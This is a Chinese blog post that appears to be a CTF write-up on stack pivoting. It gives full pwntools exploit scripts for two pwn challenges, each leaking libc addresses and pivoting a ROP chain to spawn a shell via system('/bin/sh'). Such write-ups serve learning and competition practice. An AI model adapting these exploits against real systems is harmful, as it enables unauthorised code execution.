栈迁移练习

最新推荐文章于 2024-04-18 21:01:09 发布
最新推荐文章于 2024-04-18 21:01:09 发布
阅读量202 收藏
点赞数
文章标签: 学习方法 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Civit_/article/details/129802540
版权
文章详细介绍了两道CTF安全挑战的解题过程,涉及栈迁移、缓冲区溢出、puts函数地址泄露、libc库利用,以及ROP链构造,最终目标是获取shell。在第一题中,通过选择特定选项泄露puts地址并构造ROP链;第二题中,利用两次栈迁移,首次泄露libc地址,随后获取shell。
摘要由CSDN通过智能技术生成

栈迁移基础——>栈迁移基础

a_story_of_a_pwner

这是NKCTF 2023中的一道题
checksec后IDA看下
在这里插入图片描述
在这里插入图片描述
题目中有一个菜单,打开各个选项后发现
在这里插入图片描述
前三个选项类似,read函数中的都是bss段地址。
而选项四有两种情况
在这里插入图片描述
在这里插入图片描述
可以看出了puts函数地址可以泄露出来,从而泄露libc,然后在选过123之后再选4进行栈溢出,溢出字节是不够的,所以我们把pop_rdi、sys_addr、binsh地址写入到前三个选项中的bss段
在这里插入图片描述
exp:

from pwn import *

io=remote('node2.yuzhian.com.cn',39708)
#io=process('./story')

elf=ELF('./story')
libc=ELF('./libc.so.6')

io.recvuntil("> ")
io.sendline('4')
io.recvuntil("I give it up, you can see this. 0x")
puts_addr=int(io.recv(12),16)
log.success("puts_addr="+hex(puts_addr))
libcbase=puts_addr-libc.sym['puts']
sys_addr=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b"/bin/sh"))

pop_rdi=0x401573
leave_ret=0x40139e

io.recvuntil("> ")
io.sendline('2')
io.recvuntil("what's your corment?\n")
io.send(p64(pop_rdi))
io.recvuntil("> ")
io.sendline('1')
io.recvuntil("what's your comment?\n")
io.send(p64(binsh))
io.recvuntil("> ")
io.sendline('3')
io.recvuntil("what's your corMenT?\n")
io.send(p64(sys_addr))

io.recvuntil("> ")
io.sendline('4')
io.recvuntil("now, come and read my heart...\n")
payload=b'a'*10+p64(0x4050A0-0x8)+p64(leave_ret)
io.sendline(payload)
io.interactive()

[Black Watch 入群题]PWN

checksec下
在这里插入图片描述
IDA
在这里插入图片描述
可以看到有两次read,而且第一次read到了bss段,第二次栈溢出8字节,显然不够构造rop链,所以我们栈迁移到bss段,在第一次输入的时候构造rop链。
但是这里我们需要重复迁移两次,第一次泄露libc,第二次再进行getshell
exp:

from pwn import *
from LibcSearcher import *

#p=process('./spwn')
io=remote('node4.buuoj.cn',29977)
elf=ELF('./spwn')

write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
bss_addr=0x0804A300
leave_ret=0x08048408

payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
io.recvuntil("What is your name?")
io.send(payload)

payload1=b'a'*0x18+p32(bss_addr-4)+p32(leave_ret)
io.recvuntil("What do you want to say?")
io.send(payload1)

write_addr=u32(io.recv(4))

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
sys_addr=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')

io.recvuntil("name?")
payload=p32(sys_addr)+p32(0)+p32(binsh)
io.sendline(payload)

io.recvuntil("say?")
io.sendline(payload1)

io.interactive()

在这里插入图片描述

Lxxxt_
关注
从基础到高级:AI大模型开发的技术
AI天才研究院
01-17 1377
人工智能(AI)技术在近年来取得了突飞猛进的发展,其中大模型(Large Language Models,LLMs)的出现更是掀起了新一轮的技术革命。从OpenAI的GPT系列到Google的BERT,再到更近期的Claude和PaLM,这些大模型展现出了惊人的语言理解和生成能力,正在重塑我们与技术交互的方式。然而,开发如此复杂的AI系统并非易事,它需要一整套完善的技术支持。本文旨在全面剖析AI大模型开发的技术,从基础理论到实际应用,为读者提供一个清晰而深入的认识。
《深度学习》:CANN训练营_昇腾AI入门课学习笔记(第二章 TensorFlow模型迁移&训练)
MAVER1CK的博客
10-24 1164
CANN训练营_昇腾AI入门课学习笔记(第二章 TensorFlow模型迁移&训练)
pwn】 关于迁移
wintersun的地带
05-19 3197
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
CTF-PWN迁移
m0_53921051的博客
04-05 883
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
ciscn_2019_es_2 迁移(很好的例子)
weixin_46521144的博客
07-17 1227
ciscn_2019_es_2 一道很好的迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露上地址用来给第二次做迁移使用,第二次执行迁移,控制ret跳转到我们所迁移上,执行上填写的exp。由于第二次依然是在函数帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
PWN——迁移
L2329794714的博客
08-29 1580
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
PWN题型之迁移
swedsn
07-30 1820
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
鲲鹏练习题六套.docx
04-30
HCIA-Kunpeng Application Developer认证定位于培养能够使用鲲鹏计算平台,完成应用从X86向鲲鹏平台的迁移以及基于鲲鹏平台进行应用开发部署的专业人才。本套资源(鲲鹏培训六套练习题,助你通过鲲鹏鲲鹏HCIA认证,与...
北大青鸟 综合练习 网上书城
01-17
【描述】"jsp+servlet+oracle数据库(MVC架构,包含表)" 描述了项目的核心技术。JSP是Java的一种动态网页技术,用于创建交互式的用户界面;Servlet则在服务器端处理请求和响应,提供业务逻辑支持;Oracle数据库...
两题看迁移
qq_45691294的博客
01-05 650
文章目录迁移[Black Watch 入群题]PWN 迁移 迁移的题目一般有一个特点,就是可以产生溢出,但是溢出的长度太短导致无法写完整的payload,而实质就是只能控制ebp的情况下去控制住eip从而控制程序的执行流 以 32 位程序举例,在使用 call 这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后会进行一系列操作来还原现场 lea
pwn入门之迁移
wangxunyu6的博客
03-08 1440
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
ctf pwn 题目
m0_64195960的博客
04-11 1463
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
pwn-迁移-ROP
leeham的博客
08-23 4118
# 迁移-ROP 题目描述 这里给出题目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单,main()函数中有一个while(1)的循环,循环中rop()函数执行。 rop()中有明显的溢出,最开始给s申请的内存空间为:0x40;然而read()可以读入0x50字节。 于是就...
Linux PWN技巧之迁移
小小鱼的博客
02-16 1846
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
Pwn-转移(stack immigration)
CharlesGodX的博客
04-08 1596
0x00:前言 转移(stack immigration)主要是为了解决溢出可以溢出空间大小不足的问题,HITCON-Training-master 的 lab6 就是用的这个原理,我们来实践一下这道题目。 0x01:实例 题目链接: https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab6/migration 运行一下程...
pwn迁移总结
weixin_66751120的博客
01-28 2561
迁移往往在发生溢出的函数能够溢出的只有rbp与返回地址时进行,由于不能输入更多数据来构造rop链,一般会把迁往两个位置,一是原来的,二是bss段。在了解迁移之前需要先了解两个汇编指令,这是进行迁移的关键,leave,ret,这两个一般在函数的最后都会出现,可以清空中内容。leave可以理解为mov rsp,rbp;pop rbp这两个汇编指令的效果综合,但只是效果几乎一样,但并不是真的由它俩组成,第一步就是把rbp的值赋给rsp,也就是在同一位置了;
[PWN]——迁移及部分基础
最新发布
ysy___ysy的博客
04-18 1374
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 695
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lxxxt_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值